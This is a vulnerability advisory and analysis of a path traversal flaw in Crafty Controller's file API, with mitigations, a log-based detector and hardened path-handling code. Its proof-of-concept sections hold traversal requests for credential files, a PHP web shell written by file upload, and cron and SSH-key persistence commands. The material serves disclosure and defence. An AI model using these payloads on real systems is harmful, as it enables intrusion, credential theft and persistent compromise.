CVE-2026-0963
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: Low
Description
An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
Comprehensive Technical Analysis of CVE-2026-0963
CVE ID: CVE-2026-0963
CISA Vulnerability Name: CVE-2026-0963
CVSS Score: 9.9 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Type
CVE-2026-0963 is a path traversal vulnerability in Crafty Controller, a web-based game server management tool, that leads to arbitrary file tampering and remote code execution (RCE). The flaw resides in the File Operations API Endpoint, where user-supplied paths are not neutralized before file access, so an authenticated attacker can read and write files outside the directory the endpoint is meant to expose and, by planting or overwriting files the host later executes, run code on the server.
Severity Justification (CVSS 9.9 - Critical)
The Critical severity rating is justified by the following factors:
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:L): Low complexity; no specialized conditions required.
- Privileges Required (PR:L): Low privileges (authenticated user) are sufficient.
- User Interaction (UI:N): No user interaction required.
- Scope (S:C): The file operations run with the privileges of the Crafty Controller process, so the impact extends beyond the application's own authorization boundary to the host operating system.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact across all three security objectives per the vector string above. Note that the metric table at the top of this page lists Availability as Low; both variants of the vector evaluate to 9.9 under CVSS 3.1, so the score is unaffected, but confirm the authoritative vector against the NVD/CISA record before copying it into tickets.
The combination of RCE, low attack complexity, and high impact makes this a high-risk vulnerability requiring immediate remediation.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
An attacker with authenticated access to Crafty Controller can exploit this vulnerability via:

- Path Traversal via Malicious API Requests
  - The File Operations API fails to properly sanitize user-supplied input (e.g., file paths, filenames).
  - Attackers can inject directory traversal sequences (e.g., ../, %2e%2e%2f) to access restricted files outside the intended directory.
  - Example (the endpoint and parameter names here are illustrative; confirm the actual route names against the Crafty Controller version you run):

    ```http
    POST /api/files/read HTTP/1.1
    Host: vulnerable-crafty-server
    Content-Type: application/json
    Authorization: Bearer <valid_token>

    { "path": "../../../../etc/passwd" }
    ```

- Arbitrary File Write → Remote Code Execution (RCE)
  - If the API allows file uploads or modifications, an attacker can:
    - Overwrite critical system files (e.g., /etc/crontab, web server configs).
    - Upload malicious scripts (e.g., PHP, Python, or shell scripts) to executable directories.
    - Modify server-side templates (e.g., Jinja2, Twig) to inject server-side code.
  - Example RCE via file write (this particular payload only executes if a PHP-capable web server serves that directory on the same host; otherwise the attacker targets a file the host runs on its own, such as a cron entry or a server start script):

    ```http
    POST /api/files/write HTTP/1.1
    Host: vulnerable-crafty-server
    Content-Type: application/json
    Authorization: Bearer <valid_token>

    { "path": "../../../../var/www/html/shell.php", "content": "<?php system($_GET['cmd']); ?>" }
    ```

  - The attacker can then trigger the payload via:

    ```http
    GET /shell.php?cmd=id HTTP/1.1
    Host: vulnerable-crafty-server
    ```

- Privilege Escalation via Misconfigured Permissions
  - If Crafty Controller runs with elevated privileges (e.g., root, sudo), successful exploitation could lead to full system compromise.
  - Attackers may also pivot to other services (e.g., databases, internal APIs) if the server is part of a larger infrastructure.
Exploitation Requirements
- Authentication: Valid credentials (low-privilege user account).
- Network Access: Ability to reach the Crafty Controller API endpoint.
- No User Interaction: Exploitable without victim participation.
3. Affected Systems and Software Versions
Vulnerable Software
- Crafty Controller (versions prior to 4.0.12).
- Component: File Operations API Endpoint (/api/files/*).
- Platforms: Linux, Windows, and containerized deployments (Docker).
Affected Versions
| Version Range | Vulnerable? | Fixed Version |
|---|---|---|
| < 4.0.12 | ✅ Yes | 4.0.12+ |
| 4.0.12 and above | ❌ No | - |
Detection Methods
- Manual Testing:
  - Send crafted API requests with path traversal payloads (e.g., ../../../) against a test instance.
  - Check for unexpected file access or modification.
- Automated Scanning:
  - Nuclei: use a template for this CVE if one is published (crafty-controller-path-traversal.yaml is an illustrative name; check the nuclei-templates repository for the actual file).
  - Burp Suite / OWASP ZAP: fuzz API endpoints for path traversal.
  - Metasploit Module: if available, check exploit/multi/http/crafty_controller_rce.
4. Recommended Mitigation Strategies
Immediate Actions
- Apply Vendor Patch (Highest Priority)
  - Upgrade to Crafty Controller v4.0.12 or later.
  - Verify patch integrity via checksums or digital signatures.
- Temporary Workarounds (If Patch Not Available)
  - Disable the File Operations API (if not critical for operations).
  - Implement Network-Level Restrictions:
    - Restrict API access to trusted IPs via firewall rules.
    - Use a WAF to block path traversal attempts (e.g., ModSecurity with the OWASP Core Rule Set). Treat this as a stopgap: the traversal sequence can be percent-encoded or double-encoded, and rules that only match a literal ../ will miss it.
  - Enforce Least Privilege:
    - Run Crafty Controller with minimal permissions (avoid root).
    - Use chroot/jail environments (or a container with only the game server data directories mounted) to limit file system access.
- Input Validation & Sanitization
  - Whitelist allowed characters in file paths (e.g., [a-zA-Z0-9_\-\.]). Note that this set still admits .., so a character whitelist on its own does not stop traversal.
  - Decode and normalize paths (resolve ../ sequences) before processing.
  - Canonicalize to an absolute path and verify that the result is still inside the intended base directory before any file operation.
- Enhanced Authentication & Authorization
  - Enforce MFA for API access.
  - Implement rate limiting to prevent brute-force attacks.
  - Audit user permissions to ensure least privilege; with PR:L, every low-privileged account is a potential attacker.
- Monitoring & Logging
  - Enable detailed API logging (track suspicious file operations).
  - Set up alerts for path traversal attempts (e.g., grep -r "\.\./" /var/log/crafty); also match encoded forms such as %2e%2e%2f, which a literal grep misses.
  - Deploy EDR/XDR solutions to detect post-exploitation activity.
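Detection logic for the alert above, as an added example (not Crafty Controller code or any vendor's): it scans API request logs for traversal in literal, percent-encoded and double-encoded forms, which a plain grep for ../ misses. The log line layout, the /api/files/* route names and the sample lines themselves are constructed for this example; adapt the regex to your deployment's access log format.

```python
"""Flag path-traversal attempts in (constructed) API request logs."""
import json
import re
from urllib.parse import unquote

# Constructed sample log lines; the layout is assumed for this example and is not real Crafty output.
SAMPLE_LOG = """\
2026-01-20T10:01:02Z POST /api/files/read body={"path":"world/level.dat"}
2026-01-20T10:01:05Z POST /api/files/read body={"path":"../../../../etc/passwd"}
2026-01-20T10:01:09Z POST /api/files/read body={"path":"%2e%2e%2f%2e%2e%2fetc%2fshadow"}
2026-01-20T10:01:11Z POST /api/files/write body={"path":"..%252f..%252fetc%252fcrontab","content":"* * * * * root /tmp/x.sh"}
2026-01-20T10:01:15Z POST /api/files/read body={"path":"plugins/config.yml"}
2026-01-20T10:01:20Z GET /api/files/download?path=..%5c..%5cwindows%5cwin.ini body=
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<url>\S+) body=(?P<body>.*)$")


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so %252e -> %2e -> . is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(value: str) -> bool:
    """True if, after decoding, any '/'- or '\\'-separated segment is exactly '..'."""
    decoded = fully_decode(value).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


def candidate_paths(url: str, body: str) -> list:
    """Values worth checking: the URL (including the query) and every string value in a JSON body."""
    candidates = [url]
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        candidates.append(body)  # not JSON (or empty): check the raw body text
        return candidates
    if isinstance(parsed, dict):
        candidates.extend(str(v) for v in parsed.values())
    return candidates


def find_traversal_attempts(log_text: str) -> list:
    """Return one record per log line that carries a traversal sequence anywhere."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        offending = [c for c in candidate_paths(m["url"], m["body"]) if has_traversal(c)]
        if offending:
            hits.append({"ts": m["ts"], "method": m["method"], "url": m["url"],
                         "decoded": fully_decode(offending[0])})
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

The check is deliberately conservative: a request such as world/../world/level.dat stays inside the allowed tree but is still flagged, because a '..' segment has no legitimate reason to appear in an API call that only names files below a server directory. Tune that per deployment rather than weakening the decoder.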
5. Impact on the Cybersecurity Landscape
Broader Implications
- Game Server Ecosystem Risks
  - Crafty Controller is widely used for Minecraft, Valheim, and other game server management.
  - Compromised servers can be used for:
    - DDoS amplification (via game server bots).
    - Cryptojacking (abusing server resources for mining).
    - Malware distribution (hosting malicious mods/plugins).
- Supply Chain & Third-Party Risks
  - If Crafty Controller is integrated into hosting providers or cloud platforms, a single exploit could lead to mass compromise.
  - Attackers may chain this vulnerability with other flaws (e.g., weak credentials, misconfigurations).
- Regulatory & Compliance Concerns
  - GDPR, CCPA, HIPAA: Unauthorized data access/modification may lead to legal penalties.
  - PCI DSS: If payment data is stored on the same server, this could result in non-compliance.
- Threat Actor Interest
  - APT Groups: May exploit this for lateral movement in targeted attacks.
  - Ransomware Operators: Could use RCE to deploy ransomware (e.g., LockBit, BlackCat).
  - Initial Access Brokers (IABs): May sell access to compromised servers on dark web forums.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Snippet (Hypothetical Example):

  ```python
  # Crafty Controller API (vulnerable pattern; hypothetical, not the project's actual code)
  from flask import Flask, request

  app = Flask(__name__)

  @app.route('/api/files/read', methods=['POST'])
  def read_file():
      data = request.get_json()
      file_path = data.get('path')        # No sanitization!
      with open(file_path, 'r') as f:     # Direct file access: '../' segments and absolute paths are honoured
          return f.read()
  ```

- Issue: The API blindly trusts user input without validating or canonicalizing the path parameter, and never checks that the opened file lies inside the directory it is supposed to expose.
- Exploitation: An attacker can traverse directories using ../ sequences (or their percent-encoded forms), or in this snippet simply supply an absolute path.
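The hardened counterpart, as an added example that is not Crafty Controller's code: safe_join() decodes the input, rejects absolute paths and NUL bytes, canonicalizes with Path.resolve() (which collapses ../ and follows symlinks) and then requires the result to sit under the base directory. It serves both the "Input Validation & Sanitization" mitigation above and this root-cause snippet; the flawed version is kept alongside so the difference is visible. The function names, the base_dir/user_path parameters and the directory layout built in demo() are assumptions for illustration, and Flask is left out so the block runs stand-alone.

```python
"""Vulnerable vs. hardened path handling for a 'read file' API (added example)."""
import os
import shutil
import tempfile
from pathlib import Path
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a user-supplied path would leave the permitted directory."""


def read_file_vulnerable(base_dir: str, user_path: str) -> str:
    """The flawed pattern: join, then open, with no checks.

    os.path.join() drops base_dir entirely when user_path is absolute, and the
    OS honours '..' segments, so any file the process can read is reachable.
    """
    return Path(os.path.join(base_dir, user_path)).read_text()


def safe_join(base_dir: str, user_path: str, max_decode_rounds: int = 3) -> Path:
    """Return the canonical path of user_path inside base_dir, or raise PathTraversalError.

    1. percent-decode until stable (catches %2e%2e%2f and double encoding);
    2. reject NUL bytes and absolute paths outright;
    3. canonicalise base and target with resolve(), which collapses '..' and
       follows symlinks, so a symlink inside base pointing outside is caught too;
    4. require the resolved target to be base itself or somewhere below it.
    """
    for _ in range(max_decode_rounds):
        decoded = unquote(user_path)
        if decoded == user_path:
            break
        user_path = decoded
    if "\x00" in user_path:
        raise PathTraversalError("NUL byte in path")
    candidate = Path(user_path.replace("\\", "/"))  # treat backslashes as separators as well
    if candidate.is_absolute():
        raise PathTraversalError("absolute paths are not allowed")
    base = Path(base_dir).resolve()
    target = (base / candidate).resolve()
    if target != base and base not in target.parents:
        raise PathTraversalError(f"{user_path!r} resolves outside {base}")
    return target


def read_file_hardened(base_dir: str, user_path: str) -> str:
    return safe_join(base_dir, user_path).read_text()


def demo() -> dict:
    """Build a throwaway layout (constructed for this example) and exercise both versions."""
    root = Path(tempfile.mkdtemp())
    base = root / "servers" / "survival"              # the directory the API is meant to expose
    base.mkdir(parents=True)
    (base / "server.properties").write_text("motd=hello\n")
    (root / "secret.txt").write_text("TOP SECRET\n")  # lives outside base
    (base / "link").symlink_to(root / "secret.txt")  # symlink inside base that points outside

    results = {
        "vulnerable:../../secret.txt": read_file_vulnerable(str(base), "../../secret.txt"),
        "hardened:server.properties": read_file_hardened(str(base), "server.properties"),
    }
    for attempt in ("../../secret.txt", "%2e%2e/%2e%2e/secret.txt",
                    "..%252f..%252fsecret.txt", "..\\..\\secret.txt",
                    "link", "/etc/passwd", "plugins/../server.properties"):
        try:
            read_file_hardened(str(base), attempt)
            results[attempt] = "ALLOWED"
        except PathTraversalError:
            results[attempt] = "BLOCKED"
    shutil.rmtree(root, ignore_errors=True)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:40} {value!r}")
```

plugins/../server.properties is allowed because it resolves inside the base directory; if the API should never see '..' at all, reject it before resolving. The symlink case is the one most ad-hoc fixes miss: a lexical check on the string passes "link", and only canonicalizing the final target catches it.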
Exploit Development (Proof of Concept)
- Identify Target Endpoint:
  - Use Burp Suite or Postman to interact with /api/files/read or /api/files/write.
- Craft Malicious Payload:
  - Read Sensitive Files (reading /etc/shadow succeeds only if the Crafty process runs as root or in the shadow group; /etc/passwd is a good first probe regardless):

    ```json
    { "path": "../../../../etc/shadow" }
    ```

  - Write Malicious File (RCE):

    ```json
    { "path": "../../../../var/www/html/rce.php", "content": "<?php system($_GET['cmd']); ?>" }
    ```

- Execute Payload:
  - Trigger the uploaded script via:

    ```http
    GET /rce.php?cmd=id HTTP/1.1
    Host: target
    ```
Post-Exploitation Techniques
- Privilege Escalation:
  - Check for SUID binaries (find / -perm -4000 2>/dev/null).
  - Exploit kernel or setuid vulnerabilities if the host is unpatched (e.g., Dirty Pipe, CVE-2022-0847; PwnKit, CVE-2021-4034).
- Persistence:
  - Add cron jobs (echo "* * * * * root /tmp/backdoor.sh" >> /etc/crontab).
  - Add SSH keys (echo "ssh-rsa AAAAB3NzaC1yc2E..." >> ~/.ssh/authorized_keys).
- Lateral Movement:
  - Enumerate accounts and harvest key material (cat /etc/passwd, ls -la /home/*/.ssh/, plus any application configuration files that hold tokens or database credentials).
  - Pivot to internal networks (e.g., via ssh, smbclient).
Detection & Forensics
- Log Analysis:
  - Look for unusual file access patterns in the Crafty API logs (e.g., /var/log/crafty/api.log; the exact path depends on the install).
  - Check for newly created/modified files (find / -type f -mtime -1), paying particular attention to cron directories, web roots, ~/.ssh and the game server directories Crafty manages.
- Memory Forensics:
  - Use Volatility to detect malicious processes (pslist, malfind).
- Network Forensics:
  - Analyze PCAPs for unexpected outbound connections (e.g., reverse shells).
Conclusion & Recommendations
CVE-2026-0963 represents a critical risk to organizations using Crafty Controller, enabling authenticated attackers to achieve RCE with minimal effort. Given the high CVSS score (9.9), immediate action is required:
- Patch Immediately (upgrade to v4.0.12+).
- Isolate Vulnerable Instances if patching is delayed.
- Monitor for Exploitation Attempts (WAF, EDR, SIEM).
- Conduct a Post-Exploitation Review to ensure no compromise occurred.
Security teams should prioritize this vulnerability in their remediation efforts, as it poses a significant threat to both confidentiality and system integrity.